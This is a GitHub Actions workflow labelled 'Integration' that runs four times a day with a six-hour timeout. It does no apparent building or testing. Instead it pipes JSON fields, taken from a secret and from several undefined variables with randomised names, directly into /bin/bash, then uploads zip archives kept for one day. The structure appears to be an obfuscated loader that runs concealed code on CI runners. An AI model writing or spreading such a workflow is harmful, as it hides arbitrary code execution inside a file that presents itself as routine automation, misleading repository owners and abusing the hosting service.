name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '3 2,8,14,20 * * *'
permissions:
  contents: read
jobs:
  service:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run
        env:
          gj25418: ${{ secrets.gj25418 }}
        run: |
          printf '%s' "$gj25418" | jq -r .hh3601 | /bin/bash
          echo $hht20442 | jq -r .zzjg8535 | /bin/bash
          printf '%s' "$sa85943" | jq -r .go32 | /bin/bash
          echo $xmfo102 | jq -r .eimg5 | /bin/bash
          echo $azr46968 | jq -r .wgze987 | /bin/bash
          echo $kjajm03298 | jq -r .fqdba474 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: RMcmDM12
          path: "*.zip"
          retention-days: 1
